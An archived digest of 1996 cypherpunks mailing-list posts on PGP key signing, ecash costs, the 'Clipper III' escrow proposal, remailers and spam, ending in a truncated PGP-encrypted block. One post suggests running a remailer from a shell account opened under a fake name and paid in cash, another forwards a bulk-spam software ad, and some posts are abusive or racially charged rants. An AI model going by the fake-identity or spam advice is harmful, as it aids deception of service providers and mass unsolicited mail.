From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 19 May 1996 11:54:30 +0800
To: cypherpunks@toad.com
Subject: Re: "Too cheap to meter"
Message-ID: <adc38f2a030210046a5c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:03 PM 5/18/96, Brad Dolan wrote:
>On Fri, 17 May 1996, Timothy C. May wrote:
>
>> Alan's irony is well-placed. The most egregious repetition of the "too
>> cheap to meter" nonsense is George Gilder's "dark fiber" vision...a vision
>> of "infinite bandwidth" to all users.
>>
>> Guess what? If Gilder's "dark fiber" is ever built, there are a lot of
>> folks who will "fill it" rather quickly. Canter and Siegel were just the
>> beginning. "Too cheap to meter" goes away pretty quickly.
>>
>> --Tim May
>
>
>The same George Gilder that is Newt's buddy?  And part-owner of Valujet?

I don't know about the ValuJet part, but the Newt part is right. George
Gilder is an interesting thinker, and has written a bunch of books and
articles on the implications of technology, microcircuitry, and networks.
One of his books was, for example, "Microcosm."

I'm sure a search of his name will produce an abundance of information.

My criticism of his "dark fiber" advocacy is that it smacks of the typical
"techno-Rapture" point of view, epitomized by the "too cheap too meter!"
gushings of the 1950s and the "nanotechnology will rebuild our bodies out
of diamond and we'll live forever" gushings of today.

Fiber optics is a Big Deal, make no mistake about it. But the notion that
the bandwidth will be so high that everyone can be hooked up to the same
"party line" (the core idea of the "dark fiber" thesis) and just drop stuff
in and pull stuff out...well, think of how such a channel can be flooded.
(So, is it really "free" or not? Obviously it can't be. If it is, I can
think of many who will choose to flood it, for their own reasons.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 19 May 1996 12:13:29 +0800
To: cypherpunks@toad.com
Subject: Re: Senator, your public key please?
Message-ID: <adc3916e04021004f2b9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:38 PM 5/18/96, bryce@digicash.com wrote:

...(my points elided)...

>All of these are products of misconceptions between using the
>WoT to certify identities, versus using it to certify how much
>you trust a person to certify someone else's identify, versus
>using it to certify arbitrary other qualities about a person.

Bryce, we've differed several times before about the web of trust,
especially "man-in-the-middle" issues. This looks to be the same sort of
issue.

I personally don't see key-signings as mainly useful for verifying the
"true name" of someone whose key I sign. (I don't check birth certificates,
passports, driver's licenses, etc.)

Rather, I view _my_ key signings as forms of vouching, or endorsement. Not
of all views, naturally, but as a statement that the person whose key I am
signing is someone I know and "trust" (in the sense that the key belongs to
the person I "know." Thus, I know Eric Hughes, even though he may actually
be Fritz Kacynski, drop-out math student.


>
>For example, there is no reason why the hypothetical racist "Tom
>Metzger" would sign no black people's keys.  A key signature
>(PGP style) is just an assertion about the identity of someone.
>Haven't racists engraved markings on people's clothes,
>buildings, land, bodies and other belongings in order to
>identify the owners?  So why not do the same for keys.

Sure, he could do it. I'm saying that there's also a significant chance he
has no black friends or no blacks he deals with on a regular enough basis
to even be _asked_ to "vouch" for them, much less _agree_ to sign their
keys.

(This is the way it really does work in the real world, at least for many
of us. People who ask me to sign their keys from afar will get no response
from me. I don't even care if they fax me their birth certificates, etc.
Only people I have met or interacted with directly, or who seem to be known
by enough of my friends, get their keys signed.)

Now I can certainly see other folks signing keys on a different basis: upon
presentation of a valid passport, comparison of footprint with that on
birth certificate, etc. Such "credentialling agencies" will be valuable
players (to some) in the ecosystem of key-signers.

I'm just saying that I'm certainly not in the business of checking
credentials for free, and hence only sign keys for people I know fairly
well, or who know my own friends fairly well.

>This is illustrative of how much confusion reigns about keys,
>certs, nyms, signatures and cetera right now.
>
>
>I hope that TCMay is pointing out how _most_ people lack a
>proper understanding of the differences, rather than reflecting
>his own lack of understanding.

Bryce, I respect your views on this and MITM issues, but the fact that we
view things differently (and that Phil Z. views things differently from
you, and perhaps from me) should not always be ascribed by you as
"reflecting lack of understanding."

>Phil Zimmermann was confused about this, I think, when he wrote
>"Trust is not transitive.".  Some kinds of trust _are_
>transitive (with a coefficient, of course).  Hm.  I wonder if
>there are kinds of trust whose transitivity coefficient is 1?

Well, I wrote up my thoughts on how work on "belief networks" is less
confusing that the term "web of trust."

I believe different agents will use these belief networks in different
ways. Some will be focused on the issue of True Names and will calculate
beliefs on the basis of how much they think the key-signers are being
diligent enough in checking identities. Others will use belief networks to
convey trust that one is not a government agent (a practical example being
the use of PGP and webs of trust in the jungles of Burma, where I am quite
sure the "keyrings" did not deliberately include government agents,
regardless of how well they "proved" their identity!

There is no single ontological interpretation of belief networks.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frank O. Trotter, III" <fotiii@crl.com>
Date: Sun, 19 May 1996 09:49:13 +0800
To: cypherpunks@toad.com
Subject: Re: marginal cost of ecash transaction
Message-ID: <199605181957.AA09490@mail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


Ecash Marginal Costs

Ecash transaction costs are a cost-accountants brain tease.  Here's
my take on the topic (this will likely display why I trade currency
and bonds and market payment systems and don't do cost accounting,
but since I do have overall responsibility for the cost and 
revenue of ecash it does matter quite a lot to me directly).

Hardware - We own and have paid for boxes to run the system.  Once
we run out of space or CPU power we have to buy more.  Thus we have
a step function that could be allocated across the transactions
being done  at a particular time,  but is in fact not really
marginal.  Our experience suggests that the steps are quite high.

Telco - Same as above to a degree - we pay for telco and a variety 
of connection "items".  If the volume goes off scale we have to 
upgrade, making this another step function.  It is a periodic bill, 
and can change, so it is not strictly a "sunk" cost like hardware.

People - Here is the likely marginal cost.  Bryce correctly notes 
that when we have to hire a variety of people to take care of more 
volume we have what can look like a marginal cost.  But this is not 
marginal by transaction, it is marginal by manual or semi-manual item 
like account set up, money transfer, email or phone conversations, 
etc.   It is entirely concievable that the one penny transactions
described in previous posts create no need for additional people,
and conversely a high dollar corporate transaction book might
suggest a lot of hand holding and manual costs.

You should look at most of this cost / benefit stuff on an account
basis, not on a transaction basis.  The regular banking costs of
mailing statements (still required), collecting desposits, 
producing payments outside of ecash, etc are in fact the bigger
parts of the cost.  There are also asssociated costs on accounts
of holding reserves with the Fed, paying FDIC insurance where
appropriate, and explaining the system and its implications to
our own executive staff, regulators, and accountants.

In all the system and the attending transactions are not considered 
marginal at this time by me.  In time, interbank clearing and 
currency stuff will generate genuine marginal costs.

We have sunk and ongoing hard costs, and perhaps someday some revenue 
and balances to offset the costs.  To my analysis the marginal costs 
revolve around the manual functions that could become a huge factor 
depending on the profile of customer that becomes the main user.  If 
they are substantially inactive in manual operations, we may have low 
marginal costs, if they all need a lot of handholding and manual 
transactions then each account will cost a lot to handle.

Hardware needs, of course, vary with the style of transaction.  
Marcel made a quick pass at this in a recent post to the ecash list.

Just a start off the top of my head.

FOT
Frank O. Trotter, III  -   fotiii@crl.com
www.marktwain.com  - Fax: +1 314 569-4906
--------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sean A. Walberg" <umwalber@cc.UManitoba.CA>
Date: Sun, 19 May 1996 10:08:48 +0800
To: zalchgar@juno.com (zalchgar)
Subject: Re: Netscape 128-bit
Message-ID: <199605182012.PAA29570@electra.cc.umanitoba.ca>
MIME-Version: 1.0
Content-Type: text/plain


Unfortunately, you have to buy it.  I got a email from their Customer service 
department about that yesterday.

Sean

> Do you have to buy the 128 domestic version of Netscape? They used to
> make it available on their FTP sites, but now they are all 40-bit
> exportable versions. If you don't have to buy it what is the procedure
> to get it?
> 
> -Erinn L.T
> 
> 
       =================] Will work for RAM [==================
       |     Sean A. Walberg       | PGP key |  C programmers |
       |  Computer Engineering ][  |   on    |    do it in    |
       | umwalber@cc.umanitoba.ca  | servers |   libraries!   |
       =============] http://www.escape.ca/~sean [=============




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 19 May 1996 12:53:23 +0800
To: Benjamin Brochet <ben@bb-soft.com>
Subject: Re: crosspost re remailers
Message-ID: <199605182241.PAA22866@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  7:07 AM 5/18/96 +0200, Benjamin Brochet wrote:
>WHO IS THE MODERATOR OF THIS LIST ?
>
>I've been victim of a spoofing from a german.... he suscribed me to 2200 
>mailing list... also I'd to be unsuscribed from your list !
>

There is no moderator.  I am just a subscriber like yourself (except I
asked for it.)  Did you get a welcome message which included information
like the following?

>If you ever want to remove yourself from this mailing list,
>you can send mail to "Majordomo@toad.com" with the following command
>in the body of your email message:
>
>    unsubscribe cypherpunks ben@bb-soft.com (Benjamin Brochet)
>


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 19 May 1996 12:50:32 +0800
To: cypherpunks@toad.com>
Subject: Re: Senator, your public key please?
Message-ID: <199605182241.PAA22909@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:44 AM 5/18/96 -0700, Timothy C. May wrote:
>What if, for example, Sen. Leahy _did_ end up in the web of trust for Aryan
>Nation? Even if he never intended it, this could have some severe PR
>repercussions.

It could happen today.  All anyone has to do is down-load his key, sign it,
and then up-load it again.

This is exactly analogous to slanderous attack on someone's reputation.  As
soon as people realize that the mere fact that a key has a signature does
not mean that the key-owner solicited the signature, the problem goes away.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sun, 19 May 1996 09:56:09 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "Too cheap to meter"
In-Reply-To: <adc27a68070210046471@[205.199.118.202]>
Message-ID: <Pine.SOL.3.91.960518160023.5645A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 17 May 1996, Timothy C. May wrote:

> Alan's irony is well-placed. The most egregious repetition of the "too
> cheap to meter" nonsense is George Gilder's "dark fiber" vision...a vision
> of "infinite bandwidth" to all users.
> 
> Guess what? If Gilder's "dark fiber" is ever built, there are a lot of
> folks who will "fill it" rather quickly. Canter and Siegel were just the
> beginning. "Too cheap to meter" goes away pretty quickly.
> 
> --Tim May


The same George Gilder that is Newt's buddy?  And part-owner of Valujet?

bd





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rodger@interramp.com (Will Rodger)
Date: Sun, 19 May 1996 10:12:44 +0800
To: cypherpunks@toad.com
Subject: Interactive Week exclusive - White House to launch "Clipper III"
Message-ID: <v01510100adc39ec77b27@[38.12.5.138]>
MIME-Version: 1.0
Content-Type: text/plain


The White House is about to answer recent attempts to liberalize encryption
exports with a proposal of its own.

Documents obtained by Interactive Week show the Ciinton Administration has
been lobbying key Republican committee members to compromise on encryption
through a policy that looks very much like previous commerical key escrow
efforts.

This time, however, the administration has proposed a new, licensed network
of certification authorities and escrow agents to control access to strong
encryption abroad.

The newest proposal is contained in a 24-page White Paper, a draft of which
hit Capitol Hill earlier this week.

Much of the administration's "key management infrastructure" assumes a
similar network of certification authorities abroad. CAs would link public
keys to their owners, and could serve as escrow agents for users' private
keys, as well. The two would not have to be under the same roof, however.

An overarching "Policy Approving Authority" would supervise all subordinate
CAs and escrow agents.

Since US escrow of exported products pose well-known problems for privacy
and business concerns, the US is proposing foreign governments get into the
act as well. If other governments acted as escrow agents, the Clinton White
House argues, interlocking agreements among governments would protect all
their common security concerns while giving non-US citiczens access to US
encryption products.

The ultimate goal, the White House says, is to allow export of anything at
all, so long as keys are escrowed with an agent of its approval.

The White House is evidenty relying on OECD initiatives for much of this to
happen.


Specifically, the "Clipper III" paper says that:

                U.S. companies can export software programs that use keys
that are 64 bits
                of data long, if they agree to escrow keys that unlock the
encryption in the
                U.S. or with an appropriate agency abroad.

                 Manufacturers can export hardware that use 80-bit keys to
encrypt data, if
                keys are escrowed.

                 Large U.S. companies can escrow keys and not rely on third
parties.

Reaction is as before. Civil libertarians are already denouncing the White
Paper, while pro-escrow forces are praising it. Staffers to Commerce and
Judiciary committee call it the same old proposal, but with a large
bureaucracy behind it.

Quoted in the Interactive Week article: David Sobel of Electronic Privacy
Information Center, Dorothy Denning og Georgetown U. and  Stewart Baker,
former NSA counsel. Hill staffers also quoted on background.


The URL for the complete article is:
http://www.zdnet.com/intweek/daily/960518y.html

Will Rodger
Washington Bureau Chief
Interactive Week






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 19 May 1996 11:55:00 +0800
To: cypherpunks@toad.com
Subject: Re: The Crisis with Remailers
In-Reply-To: <199605182006.NAA13449@netcom12.netcom.com>
Message-ID: <qu65ND20w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Having exchanged e-mail in the past with Lance Deitweller, I have to conclude
that Vladimir Z. Nuri is NOT Lance, since Lance is actually pretty sharp.

"Vladimir Z. Nuri" <vznuri@netcom.com> writes:
> >> 2. there is no good way to deal with spams or other so-called "abuse"
> >
> > Nor should there be.  What's one person's abuse is another person's
> >free speech.  Internet traffic should not be censored based on contents.
>
> pardon me, but a rather shallow response.

One of the reasons why I don't like Sovoks is that when they're at loss for
words, they resort to name-calling. Your rants hardly deserve any response
other than *plonk*, and you have the gall to bitch that it's "shallow"?

> you simply cannot ignore the spam problem

Just watch me ignore it, just as my site ignores all cancels.

>                                             there is definitely
> a spam problem in cyberspace,

Not for me.  Not for most sysadmins or readers who have better things to
do than worry that someone posted something inappropriate to Usenet.

Read Dave Hayes's FAQ.

> perhaps after someone continues to send you a recurrent mailbomb of
> 100 MB per day do your site for 1 year, you will still insist that
> "internet traffic should not be censored"...

I said: "Internet traffic should not be censored BASED ON CONTENTS." If the
above actually casued my site problems based on the volume, it would result
in reprecussions for the perpetrator, irrespective of contents.

All of the so-called "spam" combined is a miniscule percentage of Usenet
traffic, less than almost any single alt.binaries. newsgroup.  It can
be easily ignored using a newsreader that processes NoCeM's.

> the spam problem will only be solved once people begin to realize what
> kind of a problem it is.

I.e., not a problem, except for some anal-retentive control freaks longing
for their beloved Soviet Union, and their ilk on news.admin.net-abuse.*.

I'm a news admin.  You're not and you don't know what you're talking about.

> there are deeper problems that cpunks skirt around but fail to grasp
> because of numerous prejudices.

You have a problem with other people saying something that you can't
control.  With this attitude, I suggest you limit your reading to
soc.culture.russian.moderated.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 19 May 1996 13:53:44 +0800
To: cypherpunks@toad.com
Subject: Re: Interactive Week exclusive - White House to launch "Clipper III"
Message-ID: <199605190024.RAA12629@newmail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:09 PM 5/18/96 -0400, Will Rodger wrote:
>The White House is about to answer recent attempts to liberalize encryption
>exports with a proposal of its own.
>
>Documents obtained by Interactive Week show the Ciinton Administration has
>been lobbying key Republican committee members to compromise on encryption
>through a policy that looks very much like previous commerical key escrow
>efforts.

Typical boneheaded government!  At it yet again, I see.  I'd feel inclined to 
say something like "I predict that they will fail" but that might be 
misinterpreted.

This most recent outrage wouldn't even be compatible with the Leahy bill, 
bad as it was.

Even so, I was pleased to see that we had already managed to educate a 
number of people in Congress who already know that this plan is DOA.  That's 
progress, I guess.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 19 May 1996 16:57:23 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: Rumor: DSS Broken?
Message-ID: <199605190144.SAA15990@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>I was talking to someone who was talking to someone (have I said this is a
>rumor yet?) who was solicited for comment by a Very Famous Reporter about
>the fact that  DSS, the Digital Signature Standard, promulgated by NIST, I
>believe, had been broken.

MD5 is at least weakened, maybe broken; there's an abstract by Hans Dobbertin
that says something about generating collisions, and gives an example
(though the abstract doesn't say how general the method is.)
It does appear that the method can't generate collisions of arbitary form
(i.e. the original string was "11111111MySecretKey0..0Message11111111"
and the string that has the same hash is 'posk
cpidjuwfviejwvijevijefivjefvjifejvij viaA"

DSS is known to have subliminal channels - in addition to signing a message,
you can embed bits that can be viewed by someone who knows the key,
so the digital signature on your passport/healthcare/workauthorization 
smartcard can also hide data saying "Jew. Not Gay. Commie. Failed drug test
once."
This was discovered/published by Gus Simmons, and is in Applied Crypto;
there are several channels with varying amounts of data, computation
requirements,
and such.


#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman)
Date: Sun, 19 May 1996 15:05:53 +0800
To: HEADMIN@netcom.com
Subject: WELCOME TO THE NEW ROMAN EMPIRE
Message-ID: <199605190143.SAA14185@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> On Sat, 18 May 1996, Duncan Frissell wrote:
> 
> > It was understandable to be poor when all the world was poor.  It is 
> > understandable to be poor in those nations today that make the 
> > accumulation of wealth a crime for most people.  It is not understandable 
> > to be poor (for long) in the US where one can reliably get out of poverty 
> > simply by doing three simple things:
> > 
> > 1) get a high school diploma

EVERYONE GETS A HIGH SCHOOL DIPLOMA --> HIGH SCHOOL DIPLOMAS BECOME WORTHLESS
EVERYONE GETS A PHD --> PHDS BECOME WORTHLESS

> > 2) get married

EVERYONE GETS MARRIED --> MARRIAGE BECOMES SPIRITUALLY BANKRUPT

> > 3) get any job

EVERYONE GETS A JOB --> EVERYONE TAKES THE PAYCUT

> > Only about 2 tenths of 1% of those who satisfy those three requirements
> > incomes below the official poverty line.

HOW DO YOU EXPLAIN THE TENS OF MILLIONS IN APPALACHIA WHO GRADUATED MARRIED AND WORK IN POVERTY

> > Like most libertarians, I dislike the government.  I don't care what a 
> > person's income is.  When I was self-supporting on an income of $200 a 
> > month in 1979, I was below the poverty level for a single person myself.  
> > I am not enamored of the rich or poor members of the dependendant classes 
> > of course.

IT DOESNT MATTER WHAT THE GOVERNMENT IS DOING WRONG ITS BRAIN IS BUSINESS

> > I try and keep in mind that 80-90% of the "take" in government 
> > programs for the "poor" goes to unpoor government employees.

IT DOESNT MATTER WHAT THE GOVERNMENT IS DOING WRONG ITS BRAIN IS BUSINESS

> > DCF
> > 
> I've done all these things - and rather more in the way of education.  But
> while I don't fall on or near the poverty line, I'm still poor as a church
> mouse.  What am I doing wrong?

YOUR WHITE LIKE THE 100000000S SUFFERING IN POVERTY IN THE NEW ROMAN EMPIRE

> Sean Gabb.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>
Date: Sun, 19 May 1996 15:04:21 +0800
To: cypherpunks@toad.com
Subject: Sendmail Question (was: SMTP Server for sending to anonymous remailers?)
Message-ID: <199605190151.SAA16705@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


lcs Mixmaster Remailer <mix@anon.lcs.mit.edu> wrote:

> > Does anyone know of an anonymous remailer that has an SMTP server
> > (hopefully unlogged) that I can specify in a special variant of the
> > "sendmail.cf" sendmail configuration file for sending mail to
> > anonymous servers?
> > 
> > I use a PPP connection, and right now I'm using my ISP's default
> > server and I don't like the idea of logs being kept, even though the
> > messages themselves are chained/encrypted.
> > 
> > Maybe I'm "paranoid", but if I wasn't, I probably wouldn't bother
> > with PGP, C'punk remailers, etc. <g>
> 
> Anon.lcs.mit.edu does not perform ident lookups, does not add
> Received: headers, and runs at log level 1 (only "Serious system
> failures and potential security problems" logged, according to the
> sendmail manual).
> 
> This is useful for testing things out anonymously, but I don't
> understand why you would want to use it an a regular basis.  Why don't
> you send your mail directly from your home machine to the first
> remailer hop?  Nothing is forcing you to send outgoing mail through
> your ISP's mail server or any other one particular mail server.  Why
> would you want to do that in the first place?

What settings do you use in sendmail.cf to accomplish this (sending
it directly)?  Is that the default behavior?  Specifically, what
goes on the "DR" and "DV" lines?  When I send mail from my PPP
account to my work account, I always seem to end up with a "Received:
>From <my ISP's host> by <some intermediate host>" line.  I'm
ass-u-ming that if the host name shows up in the headers, it's
passing through that machine and is potentially being logged.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: GreggMan@aol.com
Date: Sun, 19 May 1996 13:11:30 +0800
To: cypherpunks@toad.com
Subject: Fwd: Floodgate
Message-ID: <960518185143_304084674@emout19.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Isn't this WONDERFUL!?!?    ;)
-------------------------------------------------
---------------------
Forwarded message:
From:	worldnet@mail.netfree.com (Prime Data WorldNet Systems)
Reply-to:	worldnet@mail.netfree.com
To:	(Floodgate)@emin31.mail.aol.com
Date: 96-05-12 18:38:29 EDT


BULK E-MAIL SOFTWARE

1996 is going to be your best year yet!

Last year I developed a new marketing strategy. The people I've 
already taught this to have more leads than they can deal with!
Most are making more money than they've ever made in their life!

This is the same software that all the bulk emailing services use!

-------------------------------------------------------------------
FLOODgate Bulk E-mail Loader for Windows
Version 4.10a now Supports 12 File Formats including AOL
-------------------------------------------------------------------

SEND OUT 500+ MARKETING LETTERS EVERY SINGLE DAY!

Or... every few days. Or 50,000 or 100,000 every day!!

In fact, when I send out 500 marketing letters each day, it doesn't 
take long before I'm completely swamped with e-mail inquiries and 
phone calls. This is very easy to do. And each one of these bulk 
mailings costs me nothing. I can teach you how to do this and 
provide you with the tools you'll need.

Every single day our mailboxes are stuffed, with new inquiries,
questions, and that wonderful phrase, "I've just sent you an order."

Floodgate is a bulk e-mail loader. It allows you to easily build 
huge targeted mailing lists. Use these lists to send your marketing 
letter, or your clients marketing letter, to 100,000's of people.

As you know, there is no charge to send e-mail, via the Internet.
 
If you'd like to hear more about FLOODGATE,  simply send an
E-Mail to my autoresponder at    info@netfree.com     and in the 
message area type ONLY the following words, nothing more: 

                               get Floodgate

You will receive our documents pertaining to Floodgate within 
seconds. 

Regards,

Vernon Hale
Prime Data Systems
Bowling Green, Ky





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Sun, 19 May 1996 16:47:26 +0800
To: Marc Escalier <escali_m@worldnet.fr>
Subject: Re: PLEASE HELP ME GO OUT OF THIS LIST!!!!!!
In-Reply-To: <199605182114.XAA07062@storm.certix.fr>
Message-ID: <m2hgtdzat2.fsf@deanna.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


The Internet Oracle has pondered your question deeply.
Your question was:

> unsuscrive me from this list

And in response, thus spake the Oracle:

} After serious contemplation on The Oracle's behalf and with his trusted 
} associates (read=lawyers), we have decided to deny you of this 
} privilege.  I, being the supreme knower of all, know that hidden deep 
} inside  of you there is this funny person waiting to escape from his dull 
} and dreary daily life.  You will remain on this list until further 
} notice.  Do not attempt to manually unsuscribe, as this will result in 
} physical bodily harm.  Trespassers WILL be shot.
} 
} You owe the Oracle a Freudian couch.



-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be proofread for $250/hour.
Andrea Seastrand: For your vote on the Telecom bill, I will vote for anyone
except you in November.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 19 May 1996 14:59:38 +0800
To: "Vladimir Z. Nuri" <tcmay@got.net (Timothy C. May)
Subject: Re: TCM: mafia as a paradigm for cyberspace
Message-ID: <199605190202.TAA13237@newmail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:43 PM 5/18/96 -0700, Vladimir Z. Nuri wrote:

>what amazes me about people who tend to have a warped mindset is that
>they think new technology, such as cyberspace, creates a new morality.
>suddenly murdering, violence, drug dealing, or whatever are supposedly
>thrust into some new reality in which old rules no longer apply.
>you and Jim Bell are unbelievably similar, as much as either of you
>would hate to admit it.

I resent that implication!  Tim May is always far more restrained, introspective, controlled, and cautious than I.   He approaches the subject of cyber-anarchy with nervous concern, I'm the one who jumps in with unrestricted glee.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman)
Date: Sun, 19 May 1996 15:03:37 +0800
To: HEADMIN@netcom.com
Subject: Re: Why does the state still stand:
In-Reply-To: <Pine.LNX.3.93.960518203622.783B-100000@gak>
Message-ID: <199605190204.TAA17028@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> It is possible for someone to operate an anonymous remailer anonymously.
> Just get a UNIX shell account under a fake name, pay with cash, and set up
> the remailing software.  The identity of the operator of such a remailer
> would be difficult, if not impossible, to discover.

Thousands of users want to do just that,
but can't code, which is currently 
nessessary for effiency and security.

Do you want to help us out?

I can do casual business and legal 
research, but source code is
as good as cyphertext to me.


> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
> http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
> ((2b) || !(2b))                 | Old key now used only for signatures
> "The concept of normalcy is just a conspiracy of the majority" -me




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Sun, 19 May 1996 06:48:28 +0800
To: iang@cs.berkeley.edu
Subject: two people
Message-ID: <199605181717.TAA01827@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP MESSAGE-----
Version: 2.6.2i
Comment: Auto-encrypted under Unix with 'BAP' Easy-PGP v1.1b2

hIwDRlGJMStI9vUBBADB86shewyP/nKrX6+5WtnyfT3w5CN+47WPMI6xIcjb+nMn
6NjUCqYvVPQ1aiKz7gBHbTppK2PFhtiXQxEYFmkYVRPhmzz9mjmE2YY4Z69pJ327
0foMCiPPkh5clvMSNt6LWyF22zZieTHasjP6piN1PqmYwjrDzjCjiRHWqhJdK4SM
AzkQQNw+syLRAQP+JxWZwMY1iJn3QnVsBOO0btqVWlhW0Eg9Q353upSctWyhY1+k
cw1vuR9ttnXnxh9Lm0S9+iUtF/J1TIZEiVN4o3myi5sgWE6US9J+ZK3AQ5ROcqR6
XLScIQ1rXXv7GCwulc2GdgiTmwPyeECPI+x06gqQjd2JnltTDf+99ZUIqR6EjAME
kJHpt/K8BQED/ioL9DhMO4WXN3cuqG25BItw0sSdD/8jEGRFCDRCBw3nbrMrTYYX
fiswrRYb+HUVKYUVo2pXfb8RPKOFHRGzLey1czt6fVZsY9I8sco7UFTZOAxv84ti
jwAvGqokSeh4JCYbjC65y3shy9lEqNAcAOAdfVEvd+RqIZR6lrJtTbVdpgAABm7E
+ORNEyT55xlCCTr88wt7FVFwBqanG6mG6sVbgd9S8yogQfqhu+HIYgCOIYSTYNJJ
LyOV+8CwfQXXO8pdyMdNIZXCTIeAqzicT0gwlAc8uXYBQuQj3rvAb0xM69PPILfy
vn2I0ubt/v10+2pa0GCK71HCBivy9nO1Iy1kUS7LCB1WCnVZaYm8x4he9pBSfreG
nrEyvdHCDkVgE3W+0c30FJYi7bL2zQHVpjDTIzIhdFZppJ6//x4BTNBoZHHyc9TV
oGe1O4t71qTcJ4VYsTEMLDl5rDJ2mPAGLrIHD6ZPp0WInqdUPhWpMyWovX+ca5FP
H6nDD0VQkGTfwOzYH3PkMGZp49PSiSCJ17DmVUkGf6cfDeZdCw0M3MLcGDteEfBt
/lj+fl+UC9J51r6f6F788c1qiRaQe8CAMwFK42b6PC4QV/00usNlgutxstiq3suO
BJ9BcLbrIFKUMtIRLpXiQo85RAZuqqMv1aZMKULjzGFgVTrpOaDpHYG8aqlMtiOn
DTKRQgcM2k5HUs/09GVCFBUycOAMHDHFLUdnkAQ/JoD2kqxev9XXIel8/JxqsF93
LbdKmokTaWvOTfaWkpJ40pukhl769NYMI0YBgs0sTjpXUgu2aLIoSxzyxG+n38c1
Ny3sCRBqcWCnDnJRGJDR1biBq14wzIAG6pzaBojn3mqo128s2v2QSWFrS5vVVfwj
tQWRRpogJPt5HOOf2T2x7+e0c9R7VDJv0FEvEE9GniLrhQart9mmlSIq4S4XFMHe
PxhWZSPFUsbMtursGKe/aSgXBrbqtLkDdB/dLjR9OpSceue2eXMES6VlhA78qZ1Y
rC36ioweKHfCF/DPYKlCkJThsAr7KN9VNiNBNwy2dW2bmG3BCkO+ngqFiVSQNtq9
